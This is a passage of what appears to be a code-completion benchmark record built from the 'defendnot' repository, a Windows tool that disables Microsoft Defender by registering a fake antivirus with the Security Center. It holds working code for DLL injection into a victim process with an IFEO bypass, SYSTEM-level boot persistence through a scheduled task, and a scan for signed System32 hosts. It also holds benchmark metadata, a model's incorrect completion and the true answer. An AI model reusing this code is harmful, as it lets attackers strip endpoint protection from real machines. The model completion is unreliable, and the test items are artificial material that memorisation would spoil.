.alloc_console = !program.get<bool>(\"--silent\"),\n        .verbose = program.get<bool>(\"-v\"),\n        .from_autorun = program.get<bool>(\"--from-autorun\"),\n        .autorun_type = program.get<bool>(\"--autorun-as-user\") ? /// As system on boot is the default value\n                            loader::AutorunType::AS_CURRENT_USER_ON_LOGIN :\n                            loader::AutorunType::AS_SYSTEM_ON_BOOT,\n        .enable_autorun = !program.get<bool>(\"--disable-autorun\"),\n    };\n\n    /// When running from autorun, we'll be missing all the cli arguments, so lets load some relevant ones\n    if (config.from_autorun) {\n        shared::ctx.deserialize();\n        config.verbose = shared::ctx.verbose;\n    }\n\n    if (!config.alloc_console && config.verbose) {\n        fatal_print(\"--silent flag can not be used in combination with --verbose\");\n    }\n\n    setup_window(config);\n    loader::ensure_environment();\n\n    setup_context(config);\n\n    /// \\todo @es3n1n: move this to a separate function and add move ctor for ipc\n    std::println(\"** setting up ipc\");\n    auto ipc = shared::InterProcessCommunication(shared::InterProcessCommunicationMode::READ_WRITE, true);\n    ipc->finished = false;\n\n    const auto process = load_defendnot();\n    defer->void {\n        TerminateProcess(process, 0);\n    };\n\n    wait_for_finish(ipc);\n\n    /// Only create autorun task when not running from autorun, no need to recreate it because we're missing some config vars\n    if (!config.from_autorun) {\n        process_autorun(config);\n    }\n\n    banner(config);\n\n    return EXIT_SUCCESS;\n} catch (std::exception& err) {\n    shared::alloc_console();\n    std::println(stderr, \"** fatal error: {}\", err.what());\n    system(\"pause\");\n    return EXIT_FAILURE;\n}\n\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, int nCmdShow) {\n    return main(__argc, __argv);\n}\n"], ["/defendnot/wsc-binary-check/main.cpp", "#include <Windows.h>\n#include <winternl.h>\n\n#include <filesystem>\n#include <fstream>\n#include <optional>\n#include <print>\n#include <ranges>\n#include <set>\n\n#include \"shared/defer.hpp\"\n\n#pragma comment(lib, \"Crypt32.lib\")\n\nnamespace {\n    constexpr std::string_view kTargetDirectory = \"c:\\\\Windows\\\\System32\";\n    /* constexpr */ auto kTargetFileExts = std::set<std::string_view>{\".exe\"};\n\n    constexpr std::uint16_t kDosMagic = 0x5A4D;\n    constexpr std::uint32_t kNtSignature = 0x00004550;\n    constexpr std::uint16_t kARM64Machine = 0xAA64;\n    constexpr std::uint16_t kAMD64Machine = 0x8664;\n    constexpr std::uint16_t kI386Machine = 0x014C;\n    constexpr std::uint16_t kDllCharacteristicsForceIntegrityMask = 0x80;\n\n    [[nodiscard]] std::optional<std::vector<std::uint8_t>> read_file(const std::filesystem::path path) {\n        std::ifstream file(path, std::ios::binary);\n        if (!file.good()) {\n            return std::nullopt;\n        }\n\n        const auto size = std::filesystem::file_size(path);\n        std::vector<std::uint8_t> buffer(size);\n\n        file.read(reinterpret_cast<char*>(buffer.data()), static_cast<std::streamsize>(buffer.size()));\n        return buffer;\n    }\n\n    [[nodiscard]] bool check_characteristics(const std::span<std::uint8_t> data) {\n        if (data.size() < sizeof(IMAGE_DOS_HEADER)) {\n            throw std::runtime_error(\"got invalid pe image\");\n        }\n\n        const auto p_dos = reinterpret_cast<PIMAGE_DOS_HEADER>(data.data());\n        if (p_dos->e_magic != kDosMagic) {\n            throw std::runtime_error(\"got invalid pe image (2)\");\n        }\n\n        const auto p_nt = reinterpret_cast<PIMAGE_NT_HEADERS>(data.data() + p_dos->e_lfanew);\n        if (p_nt->Signature != kNtSignature) {\n            throw std::runtime_error(\"got invalid pe image (3)\");\n        }\n\n        const auto machine = p_nt->FileHeader.Machine;\n        std::uint16_t characteristics;\n\n        if (machine == kARM64Machine || machine == kAMD64Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS64>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else if (machine == kI386Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS32>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else {\n            throw std::runtime_error(std::format(\"unsupported machine: {:#x}\", machine));\n        }\n\n        return (characteristics & kDllCharacteristicsForceIntegrityMask) != 0;\n    }\n\n    [[nodiscard]] bool check_signature(const std::filesystem::path path) {\n        HCERTSTORE store = {0};\n        HCRYPTMSG msg = {0};\n        if (!CryptQueryObject(1, path.wstring().c_str(), 0x400, 0xE, 0, nullptr, nullptr, nullptr, &store, &msg, nullptr) //\n            || !store || !msg) {\n            /// Most likely the binary is just not signed\n            return false;\n        }\n\n        defer->void {\n            CryptMsgClose(msg);\n            CertCloseStore(store, 1);\n        };\n\n        PCCERT_CONTEXT signer = nullptr;\n        if (!CryptMsgGetAndVerifySigner(msg, 0, nullptr, 2, &signer, nullptr) || signer == nullptr) {\n            throw std::runtime_error(std::format(\"CryptMsgGetAndVerifySigner() on {}\", path.string()));\n        }\n\n        defer->void {\n            CertFreeCertificateContext(signer);\n        };\n\n        /// I don't think we have to do something with signer?\n        return true;\n    }\n} // namespace\n\nint main() try {\n    for (auto& entry : std::filesystem::recursive_directory_iterator(kTargetDirectory, std::filesystem::directory_options::skip_permission_denied)) {\n        auto path = entry.path();\n        auto ext = path.extension().string() //\n                   | std::views::transform([](const char c) -> char { return ::tolower(c); }) //\n                   | std::ranges::to<std::string>();\n\n        if (!kTargetFileExts.contains(ext)) {\n            continue;\n        }\n\n        auto file = read_file(path);\n        if (!file.has_value()) {\n            std::println(stderr, \"unable to read {}\", path.string());\n            continue;\n        }\n\n        const std::span file_ptr = *file;\n        if (!check_characteristics(file_ptr)) {\n            continue;\n        }\n\n        if (!check_signature(path)) {\n            continue;\n        }\n\n        std::println(\"matches: {}\", path.string());\n    }\n\n    return EXIT_SUCCESS;\n} catch (const std::exception& e) {\n    std::println(stderr, \"fatal error: {}\", e.what());\n    return EXIT_FAILURE;\n}\n"], ["/defendnot/defendnot-loader/core/ensure_environment.cpp", "#include \"core/core.hpp\"\n#include \"shared/strings.hpp\"\n#include \"util/scm.hpp\"\n\n#include <format>\n#include <print>\n#include <stdexcept>\n\nnamespace loader {\n    void ensure_environment() {\n        auto manager = scm::Manager();\n        if (!manager.valid()) [[unlikely]] {\n            throw std::runtime_error(\"Unable to open scm::Manager\");\n        }\n\n        auto service = manager.get_service(L\"wscsvc\");\n        if (!service.valid() || !service.query_status()) {\n            throw std::runtime_error(std::format(\"{}\\nOpen error: {}\", strings::wsc_unavailable_error().data(), GetLastError()));\n        }\n\n        if (service.state() == scm::ServiceState::RUNNING) {\n            /// Wsc service has been already started, no need to start it ourselves\n            return;\n        }\n\n        /// Let's start the service ourselves\n        std::println(\"** wscsvc is not running, starting it..\");\n        if (!service.start()) {\n            throw std::runtime_error(std::format(\"{}\\nTried to start the service, but go an error: {}\", strings::wsc_unavailable_error(), GetLastError()));\n        }\n\n        std::println(\"** successfully started the service, waiting for it to get up..\");\n        while (true) {\n            if (!service.query_status(/*force=*/true)) {\n                throw std::runtime_error(\n                    std::format(\"{}\\nStarted the service, got an error while querying: {}\", strings::wsc_unavailable_error(), GetLastError()));\n            }\n\n            if (const auto state = service.state(); state == scm::ServiceState::RUNNING) {\n                std::println(\"** we are good to go\");\n                return;\n            }\n\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n    }\n} // namespace loader\n"], ["/defendnot/defendnot-loader/core/inject.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/defer.hpp\"\n#include \"shared/native.hpp\"\n\n#include <print>\n#include <stdexcept>\n\n#include <Windows.h>\n\nnamespace loader {\n    [[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n        STARTUPINFOA si = {\n            .cb = sizeof(si),\n        };\n        PROCESS_INFORMATION pi = {\n            0,\n        };\n        SECURITY_ATTRIBUTES sa = {\n            .nLength = sizeof(sa),\n            .bInheritHandle = TRUE,\n        };\n\n        /// By setting ReadImageFileExecOptions to FALSE and attaching ourselves as a debugger we can skip the IFEO\n        /// \\xref: https://github.com/es3n1n/defendnot/issues/7#issuecomment-2874903650\n        native::get_peb()->read_image_file_exec_options = 0;\n\n        std::println(\"** booting {}\", proc_name);\n        const auto process_flags = CREATE_SUSPENDED | DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS;\n        if (!CreateProcessA(nullptr, const_cast<char*>(proc_name.data()), &sa, &sa, FALSE, process_flags, nullptr, nullptr, &si, &pi)) {\n            throw std::runtime_error(std::format(\"unable to create process: {}\", GetLastError()));\n        }\n\n        /// Detach\n        native::debug_set_process_kill_on_exit(false);\n        native::debug_active_process_stop(pi.dwProcessId);\n\n        defer->void {\n            CloseHandle(pi.hThread);\n            /// Not closing hProcess because we return it\n        };\n\n        LPVOID mem = VirtualAllocEx(pi.hProcess, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (mem == nullptr) {\n            throw std::runtime_error(std::format(\"unable to allocate memory: {}\", GetLastError()));\n        }\n\n        defer->void {\n            VirtualFreeEx(pi.hProcess, mem, 0, MEM_RELEASE);\n        };\n\n        if (!WriteProcessMemory(pi.hProcess, mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n            throw std::runtime_error(std::format(\"unable to write memory: {}\", GetLastError()));\n        }\n\n        HANDLE thread = CreateRemoteThread(pi.hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(LoadLibraryA), mem, 0, nullptr);\n        if (thread == NULL) {\n            throw std::runtime_error(std::format(\"unable to create thread: {}\", GetLastError()));\n        }\n\n        defer->void {\n            CloseHandle(thread);\n        };\n\n        /// Wait for DllMain to complete\n        WaitForSingleObject(thread, INFINITE);\n        return pi.hProcess;\n    }\n} // namespace loader\n"], ["/defendnot/defendnot/dllmain.cpp", "#include \"bootstrap/bootstrap.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ipc.hpp\"\n\n#include <stdexcept>\n#include <thread>\n\n#include <Windows.h>\n\nnamespace {\n    void entry_thread(HMODULE base) {\n        bool success = false;\n        std::unique_ptr<shared::InterProcessCommunication> ipc;\n\n        try {\n            /// Open IPC handle\n            ipc = std::make_unique<shared::InterProcessCommunication>(shared::InterProcessCommunicationMode::WRITE);\n\n            /// Invoke the real entry\n            defendnot::startup();\n            success = true;\n        } catch (std::exception& err) {\n            MessageBoxA(nullptr, err.what(), \"defendnot\", MB_TOPMOST | MB_ICONERROR);\n        }\n\n        if (ipc) {\n            (*ipc)->success = success;\n            (*ipc)->finished = true;\n        }\n\n        /// Always free out module once we are done\n        FreeLibraryAndExitThread(base, 0);\n    }\n} // namespace\n\nBOOL __stdcall DllMain(HINSTANCE base, std::uint32_t call_reason, LPVOID reserved) {\n    if (call_reason != DLL_PROCESS_ATTACH) {\n        return TRUE;\n    }\n\n    const auto th = CreateThread(nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(entry_thread), base, 0, nullptr);\n    if (th != nullptr) {\n        CloseHandle(th);\n    }\n\n    return TRUE;\n}\n"]], "task_instance_info": {"created_time": "2025-08-20 19:54:09", "created_task_model": "DeepSeek-R1", "function_skeleton": "void apply(const std::string_view log_prefix, const BSTR name) {}", "code_description": "This code segment functions to: Manage registration and status updates for security components through COM interfaces by performing conditional unregistration followed by re-registration with specified parameters, then updating operational states and sub-statuses while logging all interaction outcomes."}, "inference_content": {"inference_model": "DeepSeek-R1", "inference_result": "```cpp\n[TASK_BEGIN]\nvoid apply(const std::string_view log_prefix, const BSTR name) {\n    com::ComPtr<Ty> com_object;\n    logln(\"{}: {:#x}\", log_prefix, com::checked(com::create<Ty>(com_object)));\n\n    com::ComPtr<IWscProduct> product;\n    com::checked(com_object->QueryInterface(IID_PPV_ARGS(&product)));\n\n    com::checked(product->SetProductName(name));\n    com::checked(product->Register(0));\n}\n[TASK_END]\n```", "inference_time": "2025-08-20 19-54-53"}, "editdistance_info": {"edit_distance": 18.4783, "calculate_time": "2025-08-20 19:54:53", "true_code_clean": "void apply(const std::string_view log_prefix, const BSTR name) {\n            auto inst = com::query<Ty>();\n            logln(\"{}_unregister: {:#x}\", log_prefix, com::retry_while_pending([&inst]() -> HRESULT { return inst->Unregister(); }) & 0xFFFFFFFF);\n            if (shared::ctx.state == shared::State::OFF) {\n                return;\n            }\n            logln(\"{}_register: {:#x}\", log_prefix, com::checked(inst->Register(name, name, 0, 0)));\n            logln(\"{}_update: {:#x}\", log_prefix, com::checked(inst->UpdateStatus(WSCSecurityProductState::ON, static_cast<BOOL>(true))));\n            if constexpr (std::is_same_v<Ty, IWscAVStatus4>) {\n                logln(\"{}_scan_update: {:#x}\", log_prefix, com::checked(inst->UpdateScanSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_settings_update: {:#x}\", log_prefix, com::checked(inst->UpdateSettingsSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_prot_update: {:#x}\", log_prefix, com::checked(inst->UpdateProtectionUpdateSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n            }\n        }", "predict_code_clean": "void apply(const std::string_view log_prefix, const BSTR name) {\n    com::ComPtr<Ty> com_object;\n    logln(\"{}: {:#x}\", log_prefix, com::checked(com::create<Ty>(com_object)));\n    com::ComPtr<IWscProduct> product;\n    com::checked(com_object->QueryInterface(IID_PPV_ARGS(&product)));\n    com::checked(product->SetProductName(name));\n    com::checked(product->Register(0));\n}"}}
{"repo_name": "defendnot", "file_name": "/defendnot/wsc-binary-check/main.cpp", "inference_info": {"prefix_code": "#include <Windows.h>\n#include <winternl.h>\n\n#include <filesystem>\n#include <fstream>\n#include <optional>\n#include <print>\n#include <ranges>\n#include <set>\n\n#include \"shared/defer.hpp\"\n\n#pragma comment(lib, \"Crypt32.lib\")\n\nnamespace {\n    constexpr std::string_view kTargetDirectory = \"c:\\\\Windows\\\\System32\";\n    /* constexpr */ auto kTargetFileExts = std::set<std::string_view>{\".exe\"};\n\n    constexpr std::uint16_t kDosMagic = 0x5A4D;\n    constexpr std::uint32_t kNtSignature = 0x00004550;\n    constexpr std::uint16_t kARM64Machine = 0xAA64;\n    constexpr std::uint16_t kAMD64Machine = 0x8664;\n    constexpr std::uint16_t kI386Machine = 0x014C;\n    constexpr std::uint16_t kDllCharacteristicsForceIntegrityMask = 0x80;\n\n    [[nodiscard]] std::optional<std::vector<std::uint8_t>> read_file(const std::filesystem::path path) {\n        std::ifstream file(path, std::ios::binary);\n        if (!file.good()) {\n            return std::nullopt;\n        }\n\n        const auto size = std::filesystem::file_size(path);\n        std::vector<std::uint8_t> buffer(size);\n\n        file.read(reinterpret_cast<char*>(buffer.data()), static_cast<std::streamsize>(buffer.size()));\n        return buffer;\n    }\n\n    [[nodiscard]] bool check_characteristics(const std::span<std::uint8_t> data) {\n        if (data.size() < sizeof(IMAGE_DOS_HEADER)) {\n            throw std::runtime_error(\"got invalid pe image\");\n        }\n\n        const auto p_dos = reinterpret_cast<PIMAGE_DOS_HEADER>(data.data());\n        if (p_dos->e_magic != kDosMagic) {\n            throw std::runtime_error(\"got invalid pe image (2)\");\n        }\n\n        const auto p_nt = reinterpret_cast<PIMAGE_NT_HEADERS>(data.data() + p_dos->e_lfanew);\n        if (p_nt->Signature != kNtSignature) {\n            throw std::runtime_error(\"got invalid pe image (3)\");\n        }\n\n        const auto machine = p_nt->FileHeader.Machine;\n        std::uint16_t characteristics;\n\n        if (machine == kARM64Machine || machine == kAMD64Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS64>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else if (machine == kI386Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS32>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else {\n            throw std::runtime_error(std::format(\"unsupported machine: {:#x}\", machine));\n        }\n\n        return (characteristics & kDllCharacteristicsForceIntegrityMask) != 0;\n    }\n\n    ", "suffix_code": "\n} // namespace\n\nint main() try {\n    for (auto& entry : std::filesystem::recursive_directory_iterator(kTargetDirectory, std::filesystem::directory_options::skip_permission_denied)) {\n        auto path = entry.path();\n        auto ext = path.extension().string() //\n                   | std::views::transform([](const char c) -> char { return ::tolower(c); }) //\n                   | std::ranges::to<std::string>();\n\n        if (!kTargetFileExts.contains(ext)) {\n            continue;\n        }\n\n        auto file = read_file(path);\n        if (!file.has_value()) {\n            std::println(stderr, \"unable to read {}\", path.string());\n            continue;\n        }\n\n        const std::span file_ptr = *file;\n        if (!check_characteristics(file_ptr)) {\n            continue;\n        }\n\n        if (!check_signature(path)) {\n            continue;\n        }\n\n        std::println(\"matches: {}\", path.string());\n    }\n\n    return EXIT_SUCCESS;\n} catch (const std::exception& e) {\n    std::println(stderr, \"fatal error: {}\", e.what());\n    return EXIT_FAILURE;\n}\n", "middle_code": "[[nodiscard]] bool check_signature(const std::filesystem::path path) {\n        HCERTSTORE store = {0};\n        HCRYPTMSG msg = {0};\n        if (!CryptQueryObject(1, path.wstring().c_str(), 0x400, 0xE, 0, nullptr, nullptr, nullptr, &store, &msg, nullptr) \n            || !store || !msg) {\n            return false;\n        }\n        defer->void {\n            CryptMsgClose(msg);\n            CertCloseStore(store, 1);\n        };\n        PCCERT_CONTEXT signer = nullptr;\n        if (!CryptMsgGetAndVerifySigner(msg, 0, nullptr, 2, &signer, nullptr) || signer == nullptr) {\n            throw std::runtime_error(std::format(\"CryptMsgGetAndVerifySigner() on {}\", path.string()));\n        }\n        defer->void {\n            CertFreeCertificateContext(signer);\n        };\n        return true;\n    }", "code_description": null, "fill_type": "FUNCTION_TYPE", "language_type": "cpp", "sub_task_type": null}, "context_code": [["/defendnot/defendnot-loader/core/inject.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/defer.hpp\"\n#include \"shared/native.hpp\"\n\n#include <print>\n#include <stdexcept>\n\n#include <Windows.h>\n\nnamespace loader {\n    [[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n        STARTUPINFOA si = {\n            .cb = sizeof(si),\n        };\n        PROCESS_INFORMATION pi = {\n            0,\n        };\n        SECURITY_ATTRIBUTES sa = {\n            .nLength = sizeof(sa),\n            .bInheritHandle = TRUE,\n        };\n\n        /// By setting ReadImageFileExecOptions to FALSE and attaching ourselves as a debugger we can skip the IFEO\n        /// \\xref: https://github.com/es3n1n/defendnot/issues/7#issuecomment-2874903650\n        native::get_peb()->read_image_file_exec_options = 0;\n\n        std::println(\"** booting {}\", proc_name);\n        const auto process_flags = CREATE_SUSPENDED | DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS;\n        if (!CreateProcessA(nullptr, const_cast<char*>(proc_name.data()), &sa, &sa, FALSE, process_flags, nullptr, nullptr, &si, &pi)) {\n            throw std::runtime_error(std::format(\"unable to create process: {}\", GetLastError()));\n        }\n\n        /// Detach\n        native::debug_set_process_kill_on_exit(false);\n        native::debug_active_process_stop(pi.dwProcessId);\n\n        defer->void {\n            CloseHandle(pi.hThread);\n            /// Not closing hProcess because we return it\n        };\n\n        LPVOID mem = VirtualAllocEx(pi.hProcess, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (mem == nullptr) {\n            throw std::runtime_error(std::format(\"unable to allocate memory: {}\", GetLastError()));\n        }\n\n        defer->void {\n            VirtualFreeEx(pi.hProcess, mem, 0, MEM_RELEASE);\n        };\n\n        if (!WriteProcessMemory(pi.hProcess, mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n            throw std::runtime_error(std::format(\"unable to write memory: {}\", GetLastError()));\n        }\n\n        HANDLE thread = CreateRemoteThread(pi.hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(LoadLibraryA), mem, 0, nullptr);\n        if (thread == NULL) {\n            throw std::runtime_error(std::format(\"unable to create thread: {}\", GetLastError()));\n        }\n\n        defer->void {\n            CloseHandle(thread);\n        };\n\n        /// Wait for DllMain to complete\n        WaitForSingleObject(thread, INFINITE);\n        return pi.hProcess;\n    }\n} // namespace loader\n"], ["/defendnot/defendnot-loader/main.cpp", "#include \"core/core.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n#include \"shared/ipc.hpp\"\n#include \"shared/strings.hpp\"\n#include <argparse/argparse.hpp>\n\n#include <format>\n#include <print>\n#include <thread>\n\nnamespace {\n    void setup_window(const loader::Config& config) {\n        if ((!config.from_autorun || config.verbose) && config.alloc_console) {\n            shared::alloc_console();\n        }\n    }\n\n    void setup_context(const loader::Config& config) {\n        std::println(\"** setting up context\");\n\n        if (config.name.length() > shared::kMaxNameLength) {\n            throw std::runtime_error(std::format(\"Max name length is {} characters\", shared::kMaxNameLength));\n        }\n\n        shared::ctx.state = config.disable ? shared::State::OFF : shared::State::ON;\n        shared::ctx.verbose = config.verbose;\n        std::ranges::copy(config.name, shared::ctx.name.data());\n\n        /// No need to overwrite ctx if we are called from autorun\n        if (!config.from_autorun) {\n            std::println(\"** overwriting ctx.bin\");\n            shared::ctx.serialize();\n        }\n    }\n\n    [[nodiscard]] HANDLE load_defendnot() {\n        std::println(\"** loading defendnot\");\n\n        auto dll_path = shared::get_this_module_path().parent_path();\n        dll_path /= strings::kDllName;\n        if (!std::filesystem::exists(dll_path)) {\n            throw std::runtime_error(std::format(\"{} does not exist!\", strings::kDllName));\n        }\n\n        return loader::inject(dll_path.string(), strings::kVictimProcess);\n    }\n\n    void wait_for_finish(shared::InterProcessCommunication& ipc) {\n        std::println(\"** waiting for process to finish, this can take a while\");\n        std::cout << std::flush;\n        while (!ipc->finished) {\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n        std::println(\"** success: {}\", ipc->success);\n    }\n\n    void process_autorun(const loader::Config& config) {\n        if (shared::ctx.state == shared::State::ON && config.enable_autorun) {\n            std::println(\"** added to autorun: {}\", loader::add_to_autorun(config.autorun_type));\n        } else {\n            std::println(\"** removed from autorun: {}\", loader::remove_from_autorun());\n        }\n    }\n\n    void banner(const loader::Config& config) {\n        std::println();\n        std::println(\"thanks for using {}\", strings::kProjectName);\n        std::println(\"please don't forget to leave a star at {}\", strings::kRepoUrl);\n\n        if (!config.from_autorun && config.alloc_console) {\n            system(\"pause\");\n        }\n    }\n} // namespace\n\nint main(int argc, char* argv[]) try {\n    argparse::ArgumentParser program(std::format(\"{}-loader\", strings::kProjectName), strings::kVersion.data(), argparse::default_arguments::none);\n\n    const auto fatal_print = [](const std::string_view str) -> void {\n        shared::alloc_console();\n        std::cerr << str << std::endl;\n        system(\"pause\");\n        std::exit(EXIT_FAILURE);\n    };\n\n    /// We are registering these ourselves because we have to alloc console first\n    program.add_argument(\"-h\", \"--help\")\n        .help(\"prints help message and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print, &program](const auto& /*unused*/) -> void { fatal_print(program.help().str()); });\n    program.add_argument(\"--version\")\n        .help(\"shows version and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print](const auto& /*unused*/) -> void { fatal_print(std::format(\"{}-loader v{}\", strings::kProjectName, strings::kVersion)); });\n\n    /// defendnot-loader parameters:\n    program.add_argument(\"-n\", \"--name\").help(\"av display name\").default_value(std::string(strings::kDefaultAVName)).nargs(1);\n    program.add_argument(\"-d\", \"--disable\").help(std::format(\"disable {}\", strings::kProjectName)).default_value(false).implicit_value(true);\n    program.add_argument(\"-v\", \"--verbose\").help(\"verbose logging\").default_value(false).implicit_value(true);\n    program.add_argument(\"--silent\").help(\"do not allocate console\").default_value(false).implicit_value(true);\n    program.add_argument(\"--autorun-as-user\").help(\"create autorun task as currently logged in user\").default_value(false).implicit_value(true);\n    program.add_argument(\"--disable-autorun\").help(\"disable autorun task creation\").default_value(false).implicit_value(true);\n    program.add_argument(\"--from-autorun\").hidden().default_value(false).implicit_value(true);\n\n    try {\n        program.parse_args(argc, argv);\n    } catch (std::exception& e) {\n        std::stringstream ss;\n        ss << e.what() << '\\n';\n        ss << program.help().str();\n        fatal_print(ss.str());\n        return EXIT_FAILURE;\n    }\n\n    auto config = loader::Config{\n        .name = program.get<std::string>(\"-n\"),\n        .disable = program.get<bool>(\"-d\"),\n        .alloc_console = !program.get<bool>(\"--silent\"),\n        .verbose = program.get<bool>(\"-v\"),\n        .from_autorun = program.get<bool>(\"--from-autorun\"),\n        .autorun_type = program.get<bool>(\"--autorun-as-user\") ? /// As system on boot is the default value\n                            loader::AutorunType::AS_CURRENT_USER_ON_LOGIN :\n                            loader::AutorunType::AS_SYSTEM_ON_BOOT,\n        .enable_autorun = !program.get<bool>(\"--disable-autorun\"),\n    };\n\n    /// When running from autorun, we'll be missing all the cli arguments, so lets load some relevant ones\n    if (config.from_autorun) {\n        shared::ctx.deserialize();\n        config.verbose = shared::ctx.verbose;\n    }\n\n    if (!config.alloc_console && config.verbose) {\n        fatal_print(\"--silent flag can not be used in combination with --verbose\");\n    }\n\n    setup_window(config);\n    loader::ensure_environment();\n\n    setup_context(config);\n\n    /// \\todo @es3n1n: move this to a separate function and add move ctor for ipc\n    std::println(\"** setting up ipc\");\n    auto ipc = shared::InterProcessCommunication(shared::InterProcessCommunicationMode::READ_WRITE, true);\n    ipc->finished = false;\n\n    const auto process = load_defendnot();\n    defer->void {\n        TerminateProcess(process, 0);\n    };\n\n    wait_for_finish(ipc);\n\n    /// Only create autorun task when not running from autorun, no need to recreate it because we're missing some config vars\n    if (!config.from_autorun) {\n        process_autorun(config);\n    }\n\n    banner(config);\n\n    return EXIT_SUCCESS;\n} catch (std::exception& err) {\n    shared::alloc_console();\n    std::println(stderr, \"** fatal error: {}\", err.what());\n    system(\"pause\");\n    return EXIT_FAILURE;\n}\n\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, int nCmdShow) {\n    return main(__argc, __argv);\n}\n"], ["/defendnot/defendnot-loader/core/autorun.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/com.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/strings.hpp\"\n\n#include <memory>\n#include <print>\n#include <stdexcept>\n#include <type_traits>\n\n#include <comdef.h>\n#include <taskschd.h>\n\n#pragma comment(lib, \"taskschd.lib\")\n#pragma comment(lib, \"comsupp.lib\")\n#pragma comment(lib, \"ole32.lib\")\n\nnamespace loader {\n    namespace {\n        constexpr std::string_view kTaskName = strings::kProjectName;\n\n        void co_initialize() {\n            static std::once_flag fl;\n            std::call_once(fl, []() -> void {\n                const auto result = CoInitializeEx(nullptr, COINIT_MULTITHREADED);\n\n                if (FAILED(result)) {\n                    throw std::runtime_error(\"failed to CoInitializeEx\");\n                }\n            });\n        }\n\n        template <typename Callable>\n        [[nodiscard]] bool with_service(Callable&& callback) {\n            co_initialize();\n\n            com::Ptr<ITaskService> service;\n            auto hr =\n                CoCreateInstance(CLSID_TaskScheduler, nullptr, CLSCTX_INPROC_SERVER, IID_ITaskService, reinterpret_cast<void**>(service.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            hr = service->Connect(VARIANT{}, VARIANT{}, VARIANT{}, VARIANT{});\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskFolder> root_folder;\n            hr = service->GetFolder(BSTR(L\"\\\\\"), root_folder.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Cleanup our task, we will recreate it in the callback if needed\n            root_folder->DeleteTask(BSTR(kTaskName.data()), 0);\n            return callback(service.get(), root_folder.get());\n        }\n    } // namespace\n\n    [[nodiscard]] bool add_to_autorun(AutorunType type) {\n        const auto bin_path = shared::get_this_module_path();\n\n        return with_service([bin_path, type](ITaskService* service, ITaskFolder* folder) -> bool {\n            /// Deduce the autorun config based on type\n            const auto task_trigger = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_TRIGGER_BOOT : TASK_TRIGGER_LOGON;\n            const auto logon_type = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_LOGON_SERVICE_ACCOUNT : TASK_LOGON_INTERACTIVE_TOKEN;\n\n            BSTR user_id = nullptr;\n            auto bstr_sys = bstr_t(L\"SYSTEM\");\n            if (type == AutorunType::AS_SYSTEM_ON_BOOT) {\n                user_id = bstr_sys;\n            }\n\n            com::Ptr<ITaskDefinition> task;\n            auto hr = service->NewTask(0, task.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IRegistrationInfo> reg_info;\n            hr = task->get_RegistrationInfo(reg_info.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IPrincipal> principal;\n            hr = task->get_Principal(principal.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITriggerCollection> trigger_collection;\n            hr = task->get_Triggers(trigger_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITrigger> trigger;\n            hr = trigger_collection->Create(task_trigger, trigger.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IActionCollection> action_collection;\n            hr = task->get_Actions(action_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IAction> action;\n            hr = action_collection->Create(TASK_ACTION_EXEC, action.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IExecAction> exec_action;\n            hr = action->QueryInterface(IID_IExecAction, reinterpret_cast<void**>(exec_action.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskSettings> settings;\n            hr = task->get_Settings(settings.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Elevated, when system boots\n            principal->put_UserId(user_id);\n            principal->put_LogonType(logon_type);\n            principal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);\n\n            /// Info\n            